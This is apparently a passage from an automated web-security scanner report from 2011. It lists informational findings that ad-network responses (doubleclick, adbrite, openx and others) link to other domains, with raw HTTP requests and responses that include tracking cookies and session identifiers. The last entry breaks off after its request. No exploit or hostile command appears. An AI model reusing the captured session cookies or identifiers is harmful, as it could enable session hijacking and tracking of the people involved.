Cookie: icu=ChIImdYCEAoYAiACKAIw447n7QQQ447n7QQYAQ..; anj=Kfw))ByDuq(FJl:c9U(O<@CeVOmEXW1hL>#/*4Jn(uor=(5EBh5<W.k)Y><WiS:LOiybjU0r>wWIql]AvGq/IdS!acC(FaP$cYJ!J#h1Y$?7kmw?YIqgimiBWWi-dkyfpjFRO44ek(e!)zV^HsoI@m5(lVJ]-z44hi<@/+Gxw$#QV%Etka*a%eva$=@Au!AJSu6uj*@oO@]EL5n0EQo`R]:t/`eU_45K!c^VKH`O2$i'@`s.wMV-wH9)D=aab*.arK7xs@L$@.CbO?Kb?0ZuKR(FN+u4M#Er2:Iua<E_XvS:>yEy6m-9JBYXUm+V1/.@>oBLAQ/P^+8=*EjA[(GADvf*BbS#E1e?YTKA$'LPYDp0.fkASgZh0i(^P[N`AV7o.$d3BYa-u[VwBx:I(G/:381kcgHWoswb:=`Ku>u@Cidi%Y$u9`qSJ<7rlOS'j/U/>:p6qkC9x[=9>gzl!f)'vJRUdB!F`KgLFB[sgim_V^-4E!hC:TT[Mnnesvth<EqmD]T6X<+EXw*eL#7V._]eR7wKz#+Q<jY0)9m4.Ux(+g2x6gtKj2Uf7bK$d-7jQI=`H%cII=9QVL!LY6%gg!la[qizZ#JNdA3x'%jK#?C9j?>vs79'K>b2_7w$cAnjrNM]; sess=1; uuid2=2724386019227846218

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 03-May-2011 02:10:32 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 31-Jul-2011 02:10:32 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Mon, 02 May 2011 02:10:32 GMT
Content-Length: 155

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=193&external_user_id=2724386019227846218&expiration=0" width="0" height="0"/>');
23.12. http://ads-vrx.adbrite.com/adserver/display_iab_ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads-vrx.adbrite.com
Path:   /adserver/display_iab_ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adserver/display_iab_ads?sid=1794248&title_color=0000FF&text_color=000000&background_color=fcfaf3&border_color=fcfaf3&url_color=008000&newwin=0&zs=3330305f323530&width=300&height=250&xb=13667710&xbg=12857574&xfb=0&xv=1844495&xat=1&xbt=CpcBidImpl&xc=302e30303131&xe=302e3432&xcc=a4764a3f7ec8a41fd02b6ccdfd0dc845&xdv=false&xg=4b0f5fc0-6071-4bfe-8570-deb210507cbe&xap=0&xaps=0&xfp=BELOW&url=http%3A%2F%2Fwebsiteprice.net%2Fresult%2F%3Fid%3D65934 HTTP/1.1
Host: ads-vrx.adbrite.com
Proxy-Connection: keep-alive
Referer: http://websiteprice.net/result/?id=65934
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; srh="1%3Aq64FAA%3D%3D"; b="%3A%3A12gg8%2C12ggb%2C6e73"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjYKBjc2MjcwMRDg1_T5CRiAk-zNEyIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKFAoGNzgyNjA2EIC7iqMKGICT7M0TCjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; ut="1%3AHY5LEoMgEAXvMmsWDEZDeRtQI1YmEMBPqePdg9l29et6J6wK2hPew76F1GdooXNOj1GalTHSOH9YsRXZqN7cwOnMyJJxCVLEWB1bobpKVDSsRVY5IeN3f3nPZYDzITINRMWy8xb4yY2tROeomfbm4Qvu5UJ3EgRY4%2F2Qpv8NuK4f"; vsd=0@4@4dbe1166@websiteprice.net; fq="7l04r%2C1uo0%7Clkjpsr%2C84fok%2C1uo0%7Clkigxp%2C83ol2%2C1uo0%7Clkjpss%2C84y2m%2C1uo0%7Clkjpt2%2C826ke%2C1uo0%7Clkjpsr"; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:782606:20861280::0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Content-Type: text/html
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Mon, 02 May 2011 02:22:39 GMT
Content-Length: 980

<html><head></head><body leftmargin=0 topmargin=0 bgcolor="#FFFFFF"> <!-- eyewonder -->

<script language="JavaScript" src="http://guru.sitescout.com/tag.jsp?pid=66738FF&w=300&h=250&rnd=6848350&cm=http://click.adbrite.com/c/CvMCxYEuuBnWZTkIPVmBPewA4aV85MACQqj-YPCxxOMtfurS0IoFdYEHJcpUeMvrhctEXenWGVbDxpsbhT8_FvIMQKcHOIQF4Q9tBQ7Y-8JCDDEBM-kKSZeG7SmDOwbwhtbSgbdw7sLPPEgfvXMKd5P8oWCXY9D2-QHOfg6pX0b9LTtaTQI8E9Y1hXVck9VT8EmRAoIKD-Hz3s10ZMQecjaqU1-wroyCzUm10G_MBmfksRDzlEfApCpYRe4nJ4H9-0oXD48jRc9TSMbik2vsesqhIsvKOysmRbXe1I-7Vja6eSCJtFt5tcQrjLwvpdsi29oHYRBPhO6ykaJrFmFxpw4brKP1BrwMo-Dqb-G5ehLFlDqZiwTbRSvQV1mlJyVdP_ARS3vHOjjU3Z9ymM3HNPdLFfWpeZuSmRAa7IevnP633WFtNFL5DuYwFuBIXYIP2GUCTEZxixKIhDFXNJ-gBTmXDtBT1blNlYPRxJB5sCt1ixJxrn4SEN9R-H60fWjJ_p2N9hBFksU/"></script>
<!-- 13667710 -->
<img border="0" height="0" src="http://ad.turn.com/server/pixel.htm?fpid=7" width="0" /><img border="0" height="0" src="http://adadvisor.net/adscores/g.pixel?sid=9219303187" width="0" /></body>
...[SNIP]...
23.13. http://cm.g.doubleclick.net/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pixel?nid=exelate&j=0 HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://loadus.exelator.com/load/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9jbS5nLmRvdWJsZWNsaWNrLm5ldC9waXhlbD9uaWQ9ZXhlbGF0ZSZqPTAiIHdpZHRoPSIxIiBoZWlnaHQ9IjEiPjwvaW1nPjxpbWcgc3JjPSJodHRwOi8vYWRzLmFkYnJpdGUuY29tL2Fkc2VydmVyL2JlaGF2aW9yYWwtZGF0YS84MjAxP2Q9MTAzMSIgd2lkdGg9IjAiIGhlaWdodD0iMCIgYm9yZGVyPSIwIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL3NlZ21lbnQtcGl4ZWwuaW52aXRlbWVkaWEuY29tL3NldF9wYXJ0bmVyX3VpZD9wYXJ0bmVySUQ9NzkmcGFydG5lclVJRD0xNzU0YmI2NTA2MjNjNWJlNDNmY2EwYjU3YzM5MTBkOSZzc2NzX2FjdGl2ZT0xIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz4%3D&h=8d858ba9e9afa8b40a627b6ea0e852d0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Found
Location: http://loadm.exelator.com/load/?p=204&g=001&bi=CAESENh7sluIi3Lo5TRo_oosBvM&cver=1&j=0
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Mon, 02 May 2011 01:56:10 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 298
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://loadm.exelator.com/load/?p=204&amp;g=001&amp;bi=CAESENh7sluIi3Lo5TRo_oosBvM&amp;cver=1&amp;j=0">here</A>
...[SNIP]...
23.14. http://csc.beap.ad.yieldmanager.net/i  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://csc.beap.ad.yieldmanager.net
Path:   /i

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /i?bv=1.0.0&bs=(12843fkhk(gid$BZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt,st$1304292783218678,v$1.0))&t=J-D&al=(as$12c6r0iom,aid$iFueFUwN7y4-,bi$589320551,ct$25,at$H)&s=0&r=0.17090801848098636 HTTP/1.1
Host: csc.beap.ad.yieldmanager.net
Proxy-Connection: keep-alive
Referer: http://news.yahoo.com/s/prweb/20110427/bs_prweb/prweb5276794
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=8khj7j56qmjsh&b=4&s=dk&t=110

Response

HTTP/1.1 302 Found
Date: Sun, 01 May 2011 23:34:05 GMT
Location: http://cookex.amp.yahoo.com/v2/cexposer/SIG=174r9kikp/*http%3A//csc.beap.ad.yieldmanager.net/i?bv=1.0.0&bs=(12843fkhk(gid$BZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt,st$1304292783218678,v$1.0))&t=J-D&al=(as$12c6r0iom,aid$iFueFUwN7y4-,bi$589320551,ct$25,at$H)&s=0&r=0.17090801848098636
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 543

The document has moved <A HREF="http://cookex.amp.yahoo.com/v2/cexposer/SIG=174r9kikp/*http%3A//csc.beap.ad.yieldmanager.net/i?bv=1.0.0&amp;bs=(12843fkhk(gid$BZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt,st$1304292783218678,v$1.0))&amp;t=J-D&amp;al=(as$12c6r0iom,aid$iFueFUwN7y4-,bi$589320551,ct$25,at$H)&amp;s=0&amp;r=0.17090801848098636">here</A>
...[SNIP]...
23.15. http://d1.openx.org/afr.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d1.openx.org
Path:   /afr.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /afr.php?resize=1&campaignid=246606&what=chi160x600&ct0=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBIsVPfQ--TffUN9q86QaO0KkvyMnAgAKQ3aCnJriw6u9EABABGAEgADgBUIDH4cQEYMnug4jwo-wSggEXY2EtcHViLTcyNTExNzM2MDIxMjU3NzWgAeDq_toDsgERd3d3LmphcGFuYXRvci5jb226AQoxNjB4NjAwX2FzyAEJ2gEtaHR0cDovL3d3dy5qYXBhbmF0b3IuY29tL2VsZXBoYW50L2xvZ2luLnBodG1smAKOAsACBMgCgOr2FqgDAegDvQL1AwAAAOQ%26num%3D1%26sig%3DAGiWqtwQa1xoRafBymiCbfwPHRB1hm9EPA%26client%3Dca-pub-7251173602125775%26adurl%3D;cb=1442324580& HTTP/1.1
Host: d1.openx.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=bba0cb56df6b6edbf6102c35304755de

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:07:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=bba0cb56df6b6edbf6102c35304755de; expires=Tue, 01-May-2012 02:07:47 GMT; path=/
Content-Length: 2280
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<body onload="MAX_adjustframe(window);">
<script src="http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2193540&PluID=0&w=160&h=600&5178448dd1&ncu=http://d1.openx.org/ck.php?oaparams=2__bannerid=522976__zoneid=0__OXLCA=1__cb=5178448dd1__r_id=bb886cd50eee7cc6d15eccca2981af76__r_ts=lkjpwz__oadest=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBIsVPfQ--TffUN9q86QaO0KkvyMnAgAKQ3aCnJriw6u9EABABGAEgADgBUIDH4cQEYMnug4jwo-wSggEXY2EtcHViLTcyNTExNzM2MDIxMjU3NzWgAeDq_toDsgERd3d3LmphcGFuYXRvci5jb226AQoxNjB4NjAwX2FzyAEJ2gEtaHR0cDovL3d3dy5qYXBhbmF0b3IuY29tL2VsZXBoYW50L2xvZ2luLnBodG1smAKOAsACBMgCgOr2FqgDAegDvQL1AwAAAOQ%26num%3D1%26sig%3DAGiWqtwQa1xoRafBymiCbfwPHRB1hm9EPA%26client%3Dca-pub-7251173602125775%26adurl%3D%3Bcb%3D1442324580http%253A%252F%252Fwww.zipcar.com%252Fwebchi3col75&ucm=true&ncu=$$%c$$"></script>
...[SNIP]...
<a href="%chttp%3A//bs.serving-sys.com/BurstingPipe/adServer.bs%3Fcn%3Dbrd%26FlightID%3D2193540%26Page%3D%26PluID%3D0%26Pos%3D868" target="_blank"><img src="http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=bsr&FlightID=2193540&Page=&PluID=0&Pos=868" border=0 width=160 height=600></a>
...[SNIP]...
23.16. http://dg.specificclick.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dg.specificclick.net
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /?y=3&t=h&u=http%3A%2F%2Fwww.japanator.com%2Felephant%2Fsignup.phtml&r= HTTP/1.1
Host: dg.specificclick.net
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/signup.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adp=7e-J^1^1; ug=wJ6hSWn821G3dA; smdmp=7e-J:811200901; adf=7e-J^0^0; JSESSIONID=e6b9ee4de5a3ea16db33db035dfa

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: JSESSIONID=e6cd1ea613a500dd6ba371035dc2; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Mon, 02 May 2011 01:57:37 GMT
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 569

<html><body> <script> var _comscore = _comscore || []; _comscore.push({ c1: "8", c2: "2101" ,c3: "1234567891234567891" }); (function() { var s = document.createElement("script"), el = docume
...[SNIP]...
<noscript> <img src="http://b.scorecardresearch.com/p?c1=8&c2=2101&c3=1234567891234567891&c15=&cv=2.0&cj=1" /> </noscript>
...[SNIP]...
23.17. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-5140108018215676&output=html&h=250&slotname=4535167573&w=300&lmt=1304337437&flash=10.2.154&url=http%3A%2F%2Fwww.japanator.com%2Felephant%2Flogin.phtml&dt=1304319437619&bpp=2&shv=r20110427&jsv=r20110427&correlator=1304319437654&frm=0&adk=556830188&ga_vid=878351806.1304319358&ga_sid=1304319358&ga_hid=1076911821&ga_fc=1&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1025&bih=903&ref=http%3A%2F%2Fwww.japanator.com%2Felephant%2Flogin.phtml&fu=0&ifi=2&dtd=1163&xpc=miKvAb4fmL&p=http%3A//www.japanator.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 02 May 2011 01:57:20 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 10622

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#cc0000;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.japanator.com/elephant/login.phtml%26hl%3Den%26client%3Dca-pub-5140108018215676%26adU%3Dwww.Moxiesoft.com%26adT%3DKnowledge%2BBase%2BSoftware%26adU%3Dwww.positivesearchresults.com%26adT%3DOnline%2BReputation%2BRuined%253F%26gl%3DUS&amp;usg=AFQjCNE4NjFFGoqc8ogFv-crNmcMnVwNnA" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
23.18. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-5140108018215676&output=html&h=250&slotname=4535167573&w=300&lmt=1304337450&flash=10.2.154&url=http%3A%2F%2Fwww.japanator.com%2Felephant%2Fsignup.phtml&dt=1304319450266&bpp=3&shv=r20110427&jsv=r20110427&correlator=1304319450303&frm=0&adk=556830188&ga_vid=878351806.1304319358&ga_sid=1304319358&ga_hid=1649311869&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1025&bih=903&fu=0&ifi=2&dtd=1597&xpc=ZdHsnL4dpF&p=http%3A//www.japanator.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 02 May 2011 01:57:32 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 10626

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#cc0000;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.japanator.com/elephant/signup.phtml%26hl%3Den%26client%3Dca-pub-5140108018215676%26adU%3Dwww.Moxiesoft.com%26adT%3DKnowledge%2BBase%2BSoftware%26adU%3Dwww.positivesearchresults.com%26adT%3DOnline%2BReputation%2BRuined%253F%26gl%3DUS&amp;usg=AFQjCNGMiXiNgW2pNZyS6giQzFvxZ9jSUg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
23.19. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4675364852109088&output=html&h=90&slotname=8870801362&w=728&lmt=1304337912&flash=10.2.154&url=http%3A%2F%2Fwww.greenhulk.net%2Fforums%2Fshowthread.php%3F126285-Rear-boarding-step&dt=1304319912482&bpp=3&shv=r20110427&jsv=r20110427&correlator=1304319912561&frm=0&adk=2893163048&ga_vid=1539471416.1304319910&ga_sid=1304319910&ga_hid=984664005&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1025&bih=903&fu=0&ifi=1&dtd=1173&xpc=ZURzYVvD5x&p=http%3A//www.greenhulk.net HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 02 May 2011 02:05:15 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 13601

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#5c9911;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script>
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.greenhulk.net/forums/showthread.php%253F126285-Rear-boarding-step%26hl%3Den%26client%3Dca-pub-4675364852109088%26adU%3Dwww.Moxiesoft.com%26adT%3DKnowledge%2BBase%2BSoftware%26adU%3Dwww.positivesearchresults.com%26adT%3DOnline%2BReputation%2BRuined%253F%26adU%3Dwww.Groupon.com/Chicago%26adT%3DChicago%2BCoupons%26gl%3DUS&amp;usg=AFQjCNHzJysBWRRIlwYmVzEbQuQxmuVXbw" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
23.20. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-7382611274909550&output=html&h=90&slotname=1249485879&w=728&lmt=1304328800&flash=10.2.154&url=http%3A%2F%2Fwww.newswiretoday.com%2Fnews%2F89806%2FThe_Netherlands_1_Real_Estate_Company_Selects_OUTSCAN_for_Vulnerability_Assessment_and_Management%2F&dt=1304310798928&bpp=4&shv=r20110427&jsv=r20110427&correlator=1304310800014&frm=0&adk=1305630090&ga_vid=829746307.1304310803&ga_sid=1304310803&ga_hid=1098320161&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=967&bih=903&fu=0&ifi=1&dtd=4101&xpc=XZh8klsrGe&p=http%3A//www.newswiretoday.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

